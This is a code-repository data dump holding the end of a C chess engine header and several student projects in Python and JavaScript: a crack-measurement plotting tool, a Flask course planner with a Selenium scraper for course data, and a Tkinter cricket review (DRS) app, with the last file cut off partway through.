positionalBonus(int board[], char color);\r\nint positionalBalance(int board[]);\r\nint endNodeEvaluation(Position * position);\r\nint staticEvaluation(Position * position);\r\nint getCaptureSequence(Move * captures, Position * position, int targetSquare);\r\nint staticExchangeEvaluation(Position * position, int targetSquare);\r\nint quiescenceEvaluation(Position * position);\r\n\r\n// ========= SEARCH ==========\r\n\r\nNode staticSearch(Position * position);\r\nNode quiescenceSearch(Position * position);\r\nNode alphaBeta(Position * position, char depth, int alpha, int beta);\r\nint alphaBetaNodes(Node * nodes, Position * position, char depth);\r\nNode iterativeDeepeningAlphaBeta(Position * position, char depth, int alpha, int beta, BOOL verbose);\r\nNode pIDAB(Position * position, char depth, int * p_alpha, int * p_beta);\r\nNode pIDABhashed(Position * position, char depth, int * p_alpha, int * p_beta);\r\nMove getRandomMove(Position * position);\r\nMove getAIMove(Game * game, int depth);\r\nMove parseMove(char * move);\r\nMove getPlayerMove();\r\nMove suggestMove(char fen[], int depth);\r\n\r\n// Parallel processing currently only implemented for Windows\r\n#ifdef _WIN32\r\nDWORD WINAPI evaluatePositionThreadFunction(LPVOID lpParam);\r\nDWORD WINAPI evaluatePositionThreadFunctionHashed(LPVOID lpParam);\r\nNode idabThreaded(Position * position, int depth, BOOL verbose);\r\nNode idabThreadedBestFirst(Position * position, int depth, BOOL verbose);\r\nNode idabThreadedBestFirstHashed(Position * position, int depth, BOOL verbose);\r\n#endif\r\n\r\n// ===== PLAY LOOP (TEXT) ====\r\n\r\nvoid playTextWhite(int depth);\r\nvoid playTextBlack(int depth);\r\nvoid playTextAs(char color, int depth);\r\nvoid playTextRandomColor(int depth);\r\n\r\n// ===========================\r\n\r\n#endif /* FAST_CHESS_H_ */\r\n" } ]
9
nolanlad/lab
https://github.com/nolanlad/lab
288896854c64d1e53fbe29c153f8410a9821b38b
01650ae980bc05f4fc57af58586f0d2ccb4decda
59d0ce0aed39702c209b191f52048a27fce07804
refs/heads/master
2020-04-24T00:36:39.771583
2019-02-20T00:16:07
2019-02-20T00:16:07
171,571,054
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.49947577714920044, "alphanum_fraction": 0.5221220254898071, "avg_line_length": 27.052940368652344, "blob_id": "183a1f40387588425e78978a557d8b3259d9c961", "content_id": "43600c77ea9f9fc4373243fe88d6722eb9a81b05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4769, "license_type": "no_license", "max_line_length": 112, "num_lines": 170, "path": "/crackmeasure.py", "repo_name": "nolanlad/lab", "src_encoding": "UTF-8", "text": "from matplotlib import pyplot as plt\nimport numpy as np\nfrom copy import copy\nimport json\nimport glob\n\nclass LineBuilder:\n def __init__(self, line):\n self.line = line\n self.even = False\n self.line_list = []\n self._line = Line()\n self.count = 0\n self.cid = line.figure.canvas.mpl_connect('button_press_event', self)\n \n\n def __call__(self, event):\n if event.inaxes!=self.line.axes: return\n if(event.key == 'shift'):\n print(\"zoom\")\n return\n if self.even:\n self._line.x2 = event.xdata\n self._line.y2 = event.ydata\n \n self.line.set_data([self._line.x1,self._line.x2] ,\n [self._line.y1, self._line.y2])\n self._line.id = self.count\n self.count += 1\n self.line_list.append(copy(self._line))\n self.line.figure.canvas.draw()\n else:\n self._line.x1 = event.xdata\n self._line.y1 = event.ydata\n self.even = (not self.even)\n\nclass Line:\n def __init__(self, x1=None, y1=None, x2=None, y2=None):\n self.id = None\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def length(self,x_scale,y_scale):\n self.length = get_length([self.x1,self.x2],\n [self.y1,self.y2],\n x_scale,y_scale)\n \n\ndef draw_lines(img,prefix):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_title('click to build line segments')\n v = plt.imread(img)\n ax.imshow(v)\n line, = ax.plot([], []) # empty line\n linebuilder = LineBuilder(line)\n\n plt.show()\n info = read_hdr(img.replace(\".tif\",\"-tif.hdr\"))\n xscale,yscale = float(info['PixelSizeX']),float(info['PixelSizeY'])\n line_list = linebuilder.line_list\n for i in line_list:\n i.length(xscale,yscale)\n fp = open(img+prefix+\".json\",'a')\n json.dump([i.__dict__ for i in line_list],fp)\n #return line_list\n\ndef test_lines(img,prefix):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_title('click to build line segments')\n v = plt.imread(img)\n ax.imshow(v)\n line, = ax.plot([], []) # empty line\n linebuilder = LineBuilder(line)\n\n plt.show()\n \n\ndef get_length(xs,ys,x_scale,y_scale):\n dx = xs[0] - xs[1]\n dy = ys[0] - ys[1]\n dx = dx*x_scale\n dy = dy*y_scale\n return np.sqrt(dx**2 + dy**2)\n\ndef read_hdr(fname):\n f = open(fname)\n lines = f.read().split('\\n')\n keys = {}\n for line in lines:\n if \"=\" in line:\n temp = line.split(\"=\")\n keys[temp[0]] = temp[1]\n return keys\n\ndef draw_with_lines(img,prefix,files):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_title('click to build line segments')\n v = plt.imread(img)\n ax.imshow(v)\n lines = []\n for f in files:\n dump = json.load(open(f))\n for j in dump:\n x1 = j['x1']\n x2 = j['x2']\n y1 = j['y1']\n y2 = j['y2']\n plt.plot([x1,x2],[y1,y2],'b-')\n \n line, = ax.plot([], []) # empty line\n linebuilder = LineBuilder(line)\n\n plt.show()\n info = read_hdr(img.replace(\".tif\",\"-tif.hdr\"))\n xscale,yscale = float(info['PixelSizeX']),float(info['PixelSizeY'])\n line_list = linebuilder.line_list\n for i in line_list:\n i.length(xscale,yscale)\n fp = open(img+\".\"+prefix+\".json\",'a')\n print(img+\".\"+prefix+\".json\")\n json.dump([i.__dict__ for i in line_list],fp)\n return line_list\n\ndef all_files(pattern):\n v = []\n for d in dirs:\n v.extend(glob.glob(\"/home/nolan/Desktop/101018_HNS_2-4/%s/%s\"%(d,pattern)))\n return v\n\ndef main(crack_number):\n fils = all_files(\"panorama.tif.crack[0-9].json\")\n #dirs.reverse()\n for d in dirs:\n fils = all_files(\"panorama.tif.crack[0-9].json\")\n draw_with_lines(\"/home/nolan/Desktop/101018_HNS_2-4/%s/panorama.tif\"%(d),\"crack%d\"%(crack_number), fils)\n if(input() == 'q'):\n break\n\ndef get_crack_length(files):\n points = []\n for f in files:\n data = json.load(open(f))\n if data != []:\n points.append(\n np.average(\n [d['length'] for d in data]))\n return points\n\ndef show_all_crack(files,pattern):\n for f in files:\n im = plt.imread(f.replace(pattern,\".tif\"))\n plt.imshow(im)\n dump = json.load(open(f))\n for j in dump:\n x1 = j['x1']\n x2 = j['x2']\n y1 = j['y1']\n y2 = j['y2']\n plt.plot([x1,x2],[y1,y2],'b-')\n plt.show()\n \n \n\ndirs = ['0N', '41N','61N','78N','99N','118N','139N','170N','190N','Failure']\ndirs.reverse()\n" } ]
1
WilawanLelapratak/OX
https://github.com/WilawanLelapratak/OX
a4646c63a21f891e46981b24b5cccc933c3d457b
2241daa9c4eeb858f1beee8aa33ebc323fdc181d
dc0cc6dabbdc32659a1fd8a1729c72e3860c5139
refs/heads/master
2020-06-09T15:28:31.728076
2016-12-22T06:06:20
2016-12-22T06:06:20
76,030,983
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5225903391838074, "alphanum_fraction": 0.5564758777618408, "avg_line_length": 39.7361946105957, "blob_id": "6d0f5ac95d7e192590c5dd570eb2ab533ed01c19", "content_id": "ddb09af921497865ca34f9a0499b2e21d2e2f06b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6640, "license_type": "no_license", "max_line_length": 161, "num_lines": 163, "path": "/FinalGame.py", "repo_name": "WilawanLelapratak/OX", "src_encoding": "UTF-8", "text": "import tkinter\nimport random\nfrom itertools import permutations\n\nclass Player :\n def __init__(self, name, color) :\n self.name = name\n self.color = color\n self.selected_sq = set()\n\nclass Board :\n def __init__(self, parent, sq_size, color) :\n self.parent = parent\n self.sq_size = sq_size\n self.color = color\n self._victory_ways = [{1, 2, 3, 4}, {5, 6, 7, 8}, {9, 10, 11, 12}, {13, 14, 15, 16}, #row victory\n {1, 5, 9, 13}, {2, 6, 10, 14}, {3, 7, 11, 15}, {4, 8, 12, 16}, #column victory\n {1, 6, 11, 16}, {4, 7, 10, 13}] #cross victory\n self.unused_squares_dict = { '00': 1, '10': 2, '20': 3, '30' : 4,\n '01': 5, '11': 6, '21': 7, '31' : 8,\n '02': 9, '12': 10, '22': 11, '32' : 12,\n '03': 13, '13': 14, '23': 15, '33' : 16}\n self.container = tkinter.Frame(self.parent)\n self.container.pack()\n self.canvas = tkinter.Canvas(self.container, width = self.sq_size * 4, height = self.sq_size * 4)\n self.canvas.grid()\n\n def get_unused_squares_dict(self) :\n return self.unused_squares_dict\n\n def reset_unused_squares_dict(self) :\n self.unused_squares_dict = { '00': 1, '10': 2, '20': 3, '30' : 4,\n '01': 5, '11': 6, '21': 7, '31' : 8,\n '02': 9, '12': 10, '22': 11, '32' : 12,\n '03': 13, '13': 14, '23': 15, '33' : 16}\n\n def draw_board(self) :\n for row in range(4) :\n for(column) in range(4) :\n self.canvas.create_rectangle(self.sq_size * column, self.sq_size * row, self.sq_size * (column + 1), self.sq_size * (row + 1), fill = self.color)\n\n def get_row_col(self, evt) :\n return evt.x, evt.y\n\n def floor_of_row_col(self, col, rw) :\n col_flr = col // self.sq_size\n rw_flr = rw // self.sq_size\n return col_flr, rw_flr\n\n def convert_to_key(self, col_floor, row_floor) :\n return str(col_floor) + str(row_floor)\n\n def find_coords_of_selected_sq(self, evt):\n column, row = self.get_row_col(evt)\n column_floor, row_floor = self.floor_of_row_col(column, row)\n rowcol_key_str = self.convert_to_key(column_floor, row_floor)\n corner_column = (column_floor * self.sq_size) + self.sq_size\n corner_row = (row_floor * self.sq_size) + self.sq_size\n return corner_column, corner_row\n\n def color_selected_sq(self, evt, second_corner_col, second_corner_row, player_color) :\n self.canvas.create_rectangle(\n (evt.x // self.sq_size) * self.sq_size,\n (evt.y // self.sq_size) * self.sq_size,\n second_corner_col,\n second_corner_row,\n fill = player_color)\n\n @property\n def victory_ways(self) :\n return self._victory_ways\n\nclass GamePlay(object) :\n def __init__(self, parent) :\n self.parent = parent\n self.board = Board(self.parent, 100, \"#ECECEC\")\n self.board.draw_board()\n self.unused_squares_dict = self.board.get_unused_squares_dict()\n self.player1 = Player(\"Player 1\", \"#1DE9B6\")\n self.player2 = Player(\"Player 2\", \"#FFA726\")\n self.initialize_buttons()\n self.show_menu()\n\n def initialize_buttons(self) :\n self.two_players_button = tkinter.Button(self.board.container, text = \"TWO PLAYERS\", width = 25, command = self.init_two_players_game)\n self.restart_button = tkinter.Button(self.board.container, text = \"RESTART\", width = 25, command = self.restart)\n\n def show_menu(self) :\n self.two_players_button.grid()\n\n def init_two_players_game(self) :\n self.board.reset_unused_squares_dict()\n self.player1.selected_sq = set()\n self.player2.selected_sq = set()\n self.player1_turn = True\n self.restart_button.grid()\n self.board.canvas.bind(\"<Button-1>\", self.play)\n\n def restart(self) :\n self.board.container.destroy()\n self.board = Board(self.parent, 100, \"#ECECEC\")\n self.board.draw_board()\n self.initialize_buttons()\n self.show_menu()\n\n def add_to_player_sq(self, key, player_sq) :\n current_selected_sq = self.board.unused_squares_dict[key]\n player_sq.add(current_selected_sq)\n\n def delete_used_sq(self, key) :\n del self.board.unused_squares_dict[key]\n\n def play(self, event) :\n colrow_tuple = self.board.find_coords_of_selected_sq(event)\n corner_two_col, corner_two_row = colrow_tuple[0], colrow_tuple[1]\n col_fl, row_fl = self.board.floor_of_row_col(event.x, event.y)\n rowcol_key = self.board.convert_to_key(col_fl, row_fl)\n\n try :\n self.unused_squares_dict[rowcol_key]\n except KeyError :\n return\n\n if self.player1_turn == True :\n self.add_to_player_sq(rowcol_key, self.player1.selected_sq)\n self.delete_used_sq(rowcol_key)\n self.board.color_selected_sq(event, corner_two_col, corner_two_row, self.player1.color)\n self.check_for_winner(self.player1.selected_sq, self.player1.name)\n self.player1_turn = False\n\n else :\n self.board.color_selected_sq(event, corner_two_col, corner_two_row, self.player2.color)\n self.add_to_player_sq(rowcol_key, self.player2.selected_sq)\n self.delete_used_sq(rowcol_key)\n self.check_for_winner(self.player2.selected_sq, self.player2.name)\n self.player1_turn = True\n\n def check_for_winner(self, player_sq, player_name) :\n if len(self.board.unused_squares_dict) > 0 :\n if len(player_sq) > 2 :\n for combo in permutations(player_sq, 4) :\n for wc in self.board.victory_ways :\n if set(combo) == wc :\n self.show_game_result(player_name + \" WIN!\")\n self.restart\n\n if len(self.board.unused_squares_dict) == 0 :\n self.show_game_result(\"Game Tie!\")\n self.restart\n\n def show_game_result(self, txt) :\n result_label = tkinter.Label(self.board.container, text = txt, width = 32, height = 10, foreground = \"white\", background = \"black\", borderwidth = 3)\n result_label.grid(row = 0, column = 0)\n self.board.canvas.unbind(\"<Button-1>\", self.play)\n\ndef main() :\n root = tkinter.Tk()\n root.title(\"OX Special 4x4\")\n ox_game = GamePlay(root)\n root.mainloop()\n\nif __name__ == '__main__' :\n main()\n" } ]
1
GPAlzate/SageSchedule
https://github.com/GPAlzate/SageSchedule
e826f0dd30c431d1e199869adef24cbb3bb1222e
41917a47fd78d1dcafc7ecdfa9b6ef5808ca8e61
06caf284f40ea25a46fb141ea9011d32e6e80793
refs/heads/main
2023-04-29T21:44:49.058778
2021-05-13T06:32:34
2021-05-13T06:32:34
358,098,912
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5902985334396362, "alphanum_fraction": 0.591791033744812, "avg_line_length": 28.14130401611328, "blob_id": "b027413752d74542f6653a34497f1f48be238618", "content_id": "b9c9d96b098b589b07ca878a549db509ac3eea65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2680, "license_type": "no_license", "max_line_length": 100, "num_lines": 92, "path": "/static/main.js", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "// save toggled elements in a list to toggle their 'hidden' back after modal closes\nvar toggledElts = []\nvar selectedCourse = null\n\nconst overlay = document.querySelector('.modal-overlay')\noverlay.addEventListener('click', toggleModal)\n\ndocument.querySelectorAll('.modal-close').forEach((modal)=>{\n modal.addEventListener('click', toggleModal)\n})\n\ndocument.onkeydown = function(evt) {\n evt = evt || window.event\n var isEscape = false\n if (\"key\" in evt) {\n isEscape = (evt.key === \"Escape\" || evt.key === \"Esc\")\n } else {\n isEscape = (evt.keyCode === 27)\n }\n if (isEscape && document.body.classList.contains('modal-active')) {\n toggleModal()\n }\n};\n\nfunction toggleModal(course) {\n selectedCourse = course\n const body = document.querySelector('body')\n const modal = document.querySelector('.modal')\n modal.classList.toggle('opacity-0')\n modal.classList.toggle('pointer-events-none')\n var isToggled = body.classList.toggle('modal-active')\n\n if (isToggled) {\n\n // untoggle previous text\n toggledElts.forEach((elt) => {\n elt.classList.toggle('hidden')\n })\n toggledElts = []\n\n const data = JSON.parse(course)\n var title = document.getElementById('modalTitle').innerText = 'Add ' + data['Course Number']\n\n var geToId = {\n 'Breadth Area': 'areaReq',\n 'Physical Education': 'peReq',\n 'Language': 'langReq',\n 'Analyzing Difference': 'analyzingReq',\n 'Speaking Intensive': 'speakingReq',\n 'Writing Intensive': 'writingReq'\n }\n\n Object.keys(data).forEach((ge) => {\n if (ge === 'Course Title' || ge === 'Course Number' || !data[ge]) {\n return // this is foreach continue\n }\n const tagId = geToId[ge]\n toggledElts.push(toggleElt(tagId, tagId === 'areaReq' ? data[ge] : null))\n })\n if (!toggledElts.length) {\n toggledElts.push(toggleElt('reqsNone'))\n }\n } \n}\n\nfunction toggleElt(tagId, area=null) {\n var elt = document.getElementById(tagId)\n if (area) {\n elt.innerText = area\n }\n elt.classList.toggle('hidden')\n return elt\n}\n\n$('#addCourse').click(function() {\n var selectedSem = $('#semSelect option:selected').text()\n var selectedCourse = window.selectedCourse\n\n $.ajax({\n type: \"POST\",\n url: \"addCourse\",\n data: JSON.stringify({\n 'sem': selectedSem,\n 'course': selectedCourse\n }),\n contentType: \"application/json; charset=utf-8\",\n dataType: \"json\",\n success: function(response) {\n location.reload();\n }\n })\n});" }, { "alpha_fraction": 0.6922268867492676, "alphanum_fraction": 0.7163865566253662, "avg_line_length": 24.756755828857422, "blob_id": "965207184381463b9ce5d06019cfabbcb20fbc48", "content_id": "b8803bf56956ebf0861963aeb48cdb83fe6f22c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 952, "license_type": "no_license", "max_line_length": 135, "num_lines": 37, "path": "/README.md", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "# CSCI181: Final Project\n## Gabe Alzate, Samuel So\n\nProject Outline\n\n1. Gather course information from 2021-2022 course catalog.\n - reach out to registrar for dependencies\n - if not, either i) hard-code information, ii) scrape from course-catalog using NLP techniques (e.g., regex search \"pre-requisite\")\n\n2. Map out \"front-end\"\n - Map out user interactions \n\nSemester-to-semester course schedule\n1. add/remove courses\n2. checkbox of requirements (fulfilled as courses are added)\n - foreign language\n - pe\n - breadth (areas 1-6)\n - overlays (speaking, writing, analyzing difference)\n - ID1\n3. customizable number of units\n4. valid schedule? (dependencies (pre-reqs), and if current schedule, timing)\n\nTO DO NEXT\n1. Search function \n a. \"fuzzier\" functionality\n b. based on course description\n c. \n2. Add to schedule\n3. Course list: put area/breadth requirements concisely\n\nThings to run:\n\n```\nflask run\npnpm run tw:build\n```" }, { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.6230435967445374, "avg_line_length": 29.64285659790039, "blob_id": "2de80549a6900d442da6047052b7b289849511c9", "content_id": "e889f53e3ff8ad273a1b58bec967b58eb00766b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3003, "license_type": "no_license", "max_line_length": 83, "num_lines": 98, "path": "/app.py", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "#\n# The main driver of the academic planner app\n#\nfrom src.scraper import get_courses\n\nimport os\nimport re\nimport json\n\nfrom flask import Flask, redirect, render_template, request, session, jsonify\n\nSCHOOL_YEAR = 21\nNUM_SEMS = 8\n\napp = Flask(__name__)\napp.secret_key = 'all our celebrities keep dying'\n\ndf = get_courses()\n\ndef create_semesters():\n semesters = []\n for i in range(NUM_SEMS):\n # create a dictionary of semesters in session\n # each sem will store the courses selected by the user\n sem = f\"{'Spring' if i % 2 else 'Fall'} '{SCHOOL_YEAR + (i + 1)//2}\"\n semesters.append(sem)\n session[sem] = []\n\n # save the dictionary of semester strings\n session['semesters'] = semesters\n\n# The home page\n@app.route('/')\ndef index():\n # session.clear()\n if 'school_year' not in session:\n session['school_year'] = SCHOOL_YEAR\n if 'semesters' not in session:\n session['num_sems'] = NUM_SEMS\n create_semesters()\n if 'breadth_reqs' not in session:\n session['breadth_reqs'] = [None] * 6\n if 'overlay_reqs' not in session:\n session['overlay_reqs'] = {\n 'Analyzing Difference' : None,\n 'Writing Intensive' : None,\n 'Speaking Intensive' : None\n }\n for n in session:\n print(f'{n}:{session[n]}')\n return render_template('index.html', courses=None)\n\n@app.route('/search')\ndef search():\n q = request.args.get('q')\n courses = None\n if q:\n # split query by non-alphanum characters\n keywords = re.split('[^a-zA-Z0-9]', q)\n\n # regex query: contains all of the keywords\n pattern = ''.join([f\"(?=.*{w})\" for w in keywords]) + \".+\"\n courses = df[\n df['Course Title'].str.contains(pattern, regex=True, case=False) |\n df['Course Number'].str.contains(pattern, regex=True, case=False)\n ]\n \n return render_template('index.html', courses=courses)\n\n@app.route('/addCourse', methods=['POST'])\ndef addCourse():\n data = request.get_json()\n sem = data['sem']\n course = json.loads(data['course'])\n\n # add course to session\n session[sem].append(course)\n\n # update fulfilled breadth reqs\n area = course['Breadth Area']\n num = int(course['Breadth Area'][-1]) if area else None\n if num and not session['breadth_reqs'][num-1]:\n session['breadth_reqs'][num -1] = course\n\n # update overlays (a course can only fulfill one overlay)\n overlay_reqs = session['overlay_reqs']\n if not overlay_reqs['Analyzing Difference'] and course['Analyzing Difference']:\n overlay_reqs['Analyzing Difference'] = course\n elif not overlay_reqs['Writing Intensive'] and course['Writing Intensive']:\n overlay_reqs['Writing Intensive'] = course\n elif not overlay_reqs['Speaking Intensive'] and course['Speaking Intensive']:\n overlay_reqs['Speaking Intensive'] = course\n\n session.modified = True\n return course\n\nif __name__== '__main__':\n app.run(debug=True)\n" }, { "alpha_fraction": 0.6256777048110962, "alphanum_fraction": 0.6310995221138, "avg_line_length": 32.4202880859375, "blob_id": "929b79a76e4e0ddd8f2b350c642d001113772065", "content_id": "73093d71d6f93cd12f8344e264c5a1a43032bd54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4611, "license_type": "no_license", "max_line_length": 98, "num_lines": 138, "path": "/src/scraper.py", "repo_name": "GPAlzate/SageSchedule", "src_encoding": "UTF-8", "text": "#\n# CSCI181 Final Project: \n# Names: Gabe, Samuel So\n# \n\nimport pandas as pd\nimport numpy as np\nimport os\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import StaleElementReferenceException\n\nPOMONA_GEs_URL = (\n \"https://tableau.campus.pomona.edu/views/GEdashboardforweb/DashboardforWeb?\"\n \":embed=y&:display_count=n&:origin=viz_share_link&:showVizHome=n\"\n)\n\ndef get_browser():\n # chrome options: set the download destination to current directory\n chromeOptions = webdriver.ChromeOptions()\n prefs = {\"download.default_directory\" : os.path.abspath('.')}\n chromeOptions.add_experimental_option(\"prefs\",prefs)\n\n # don't open browser window\n chromeOptions.add_argument('headless')\n chromeOptions.add_argument('window-size=1200x600')\n return webdriver.Chrome(executable_path='./static/chromedriver', options=chromeOptions)\n\ndef selenium_click_download(driver, wait):\n # click download\n download_path = '//*[@id=\"download-ToolbarButton\"]'\n driver.find_element_by_xpath(download_path).click()\n\n # select the crosstab option (allows to download excel/csv)\n crosstab_path = '//*[@id=\"DownloadDialog-Dialog-Body-Id\"]/div/fieldset/button[3]'\n wait.until(\n EC.presence_of_element_located(\n (By.XPATH, crosstab_path)\n )\n ).click()\n\n # pick the \"Course List\" spreadsheet\n course_list_path = (\n '//*[@id=\"export-crosstab-options-dialog-Dialog-BodyWrapper-Dialog-Body-Id\"]'\n '/div/div[1]/div[2]/div/div/div[7]/div/div/div' \n )\n wait.until(\n EC.presence_of_element_located(\n (By.XPATH, course_list_path)\n )\n ).click()\n\n # and finally download (excel)\n final_download = (\n '//*[@id=\"export-crosstab-options-dialog-Dialog-BodyWrapper-Dialog-Body-Id\"]'\n '/div/div[3]/button'\n )\n driver.find_element_by_xpath(final_download).click()\n\ndef download_tableau_courses():\n\n # open driver and create explicit waiter object\n driver = get_browser()\n driver.get(POMONA_GEs_URL)\n wait = WebDriverWait(driver, 10)\n\n try:\n # click clear all\n print(\"Clearing filters...\")\n clear_all_path = \"//*[@id='tabZoneId17']/div/div/div\"\n wait.until(\n EC.visibility_of_element_located(\n (By.XPATH, clear_all_path)\n )\n ).click()\n\n # get all the dropdowns. we can't get just one because the ids are always changing\n print(\"Waiting for updated courses...\")\n discipline_path = (\n \"//*[starts-with(@id, 'tab-ui-id-') and \"\n \"@class='tabComboBoxName' and \"\n \"text()='(All)']\"\n )\n\n # wait for there to be 3 '(All)' fields\n wait.until(\n EC.presence_of_element_located(\n (By.XPATH, f\"({discipline_path})[2]\")\n )\n )\n \n except Exception as e:\n print(e)\n print(\"An error occurred trying to filter the data.\")\n\n # StaleElement expected here for the first download attempt. this while loop simply retries\n # three more times (should work after the next attempt)\n print(\"Downloading Course List.xlsx...\")\n max_attempts = 3\n while max_attempts:\n try:\n selenium_click_download(driver, wait)\n print(\"Courses successfully downloaded.\", end=\"\")\n return\n except StaleElementReferenceException as s:\n if max_attempts < 3:\n print(s)\n print(\"Download error occurred. Trying again...\")\n max_attempts -= 1\n \n print(\"Too many attempts. Closing...\")\n\ndef get_courses():\n # if course list isn't there already, get it\n if not os.path.exists('Course List.xlsx'):\n # scrape GEs from Tableau. Done by physically downloading the excel spreadsheet of courses\n print(\"Scraping GEs...\")\n\n # download the excel spreadsheet of courses\n download_tableau_courses()\n\n print(\"Getting courses...\", end=\"\")\n while not os.path.exists('Course List.xlsx'):\n print(\".\", end=\"\")\n time.sleep(1)\n print(\" Success!\")\n \n df = pd.read_excel('Course List.xlsx')\n\n # remove rows with n/a course number and change whitespace to nan\n df_clean = df.dropna(subset=['Course Number']).replace(r'^\\s*$', np.nan, regex=True)\n\n # drop redundant columns\n return df_clean.drop(columns=['Language Requirement', 'Breadth Area Description'])" } ]
4
Pardeepjakhar/DRS
https://github.com/Pardeepjakhar/DRS
0fad0d39e5fc845ce82e718dbc76a9f97f40453e
9ffb18f40be46e32f4331d0cac4449f79afa5946
c699ff488aa89ffbffb7a91633b10f210a4f8dec
refs/heads/master
2023-01-29T00:28:21.916909
2020-11-23T14:46:43
2020-11-23T14:46:43
315,348,114
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7653239965438843, "alphanum_fraction": 0.7880910634994507, "avg_line_length": 26.238094329833984, "blob_id": "7d2fd4a7a8411058890ce88d58e7b3caa2406d8d", "content_id": "83e192a6b66320259c2539492a7a241dd8890bd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 571, "license_type": "no_license", "max_line_length": 72, "num_lines": 21, "path": "/main/main/main.py", "repo_name": "Pardeepjakhar/DRS", "src_encoding": "UTF-8", "text": "import tkinter\nimport cv2\nimport PIL.Image,PIL.ImageTk\nfrom functools import partial\nimport threading \nimport time\nimport imutils\n\n#set width and height of screen\nSET_WIDTH=650\nSET_HEIGHT=368\n\n#Tkinder gui start here\nwindow = tkinter.TK()\nwindow.title(\"DRS System by pardeep jakhar\")\ncv_img=cv2.cvtColor(cv2.imread(\"logo.png\"), cv2.COLOR_BGR2RGB)\ncanvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)\nphoto=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))\nimage_on_canvas=canvas.create_image(0, 0, ancho=tkinter.NW, image=photo)\ncanvas.pack()\nwindow.mainloop()" }, { "alpha_fraction": 0.6827924251556396, "alphanum_fraction": 0.7048377394676208, "avg_line_length": 30.114286422729492, "blob_id": "670a73d64b8c7b550dc35cc140c6f631c9630812", "content_id": "0c3dd2cd179aaa574675b8784f22f19fb1523325", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3266, "license_type": "no_license", "max_line_length": 93, "num_lines": 105, "path": "/drsmain.py", "repo_name": "Pardeepjakhar/DRS", "src_encoding": "UTF-8", "text": "import tkinter\nimport cv2\nimport PIL.Image,PIL.ImageTk\nfrom functools import partial\nimport threading\nimport time\nimport imutils\n\nstream=cv2.VideoCapture(\"clip2.mp4\")\nflag = True\ndef play(speed):\n global flag\n print(f\"play speed is {speed}\")\n frame1=stream.get((cv2.CAP_PROP_POS_FRAMES))\n stream.set(cv2.CAP_PROP_POS_FRAMES,frame1+speed)\n\n grabbed,frame= stream.read()\n if not grabbed:\n exit()\n frame=imutils.resize(frame, width=SET_WIDTH,height=SET_HEIGHT)\n frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image=frame\n canvas.create_image(0,0,image=frame, anchor=tkinter.NW)\n if flag:\n canvas.create_text(134,26,fill=\"black\",font=\" Time 26 bold\", text=\"Decision Pending\")\n flag=not flag\n\ndef pending(decision):\n # Display decisiom pending image\n frame=cv2.cvtColor(cv2.imread(\"pending.png\"),cv2.COLOR_BGR2RGB)\n frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)\n frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image = frame\n canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)\n\n # wait for 1 second\n time.sleep(2)\n\n #Display sponser image\n frame = cv2.cvtColor(cv2.imread(\"logo.png\"), cv2.COLOR_BGR2RGB)\n frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)\n frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image = frame\n canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)\n\n # wait for 1 second\n time.sleep(2.5)\n\n # Display out / not_out decision\n if decision==\"out\":\n decisionImg=\"out.png\"\n else:\n decisionImg=\"not-out.png\"\n\n frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)\n frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)\n frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))\n canvas.image = frame\n canvas.create_image(0, 0, image=frame, anchor=tkinter.NW)\n\n\ndef not_out():\n thread = threading.Thread(target=pending, args=(\" not_out\",))\n thread.daemon = 1\n thread.start()\n print(\"you are not_out\")\n\ndef out():\n thread=threading.Thread(target=pending,args=(\"out\",))\n thread.daemon=1\n thread.start()\n print(\"You are out \")\n\n#set width and height of screen\nSET_WIDTH=650\nSET_HEIGHT=368\n\n#Tkinder gui start here\nwindow=tkinter.Tk()\nwindow.title(\"DRS System by pardeep jakhar\")\ncv_img=cv2.cvtColor(cv2.imread(\"logo.png\"), cv2.COLOR_BGR2RGB)\ncanvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)\nphoto=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))\nimage_on_canvas=canvas.create_image(0, 0, ancho=tkinter.NW, image=photo)\ncanvas.pack()\n\n#Create button\nbtn=tkinter.Button(window,text=\"<< Previous (Fast)\", width=50 , 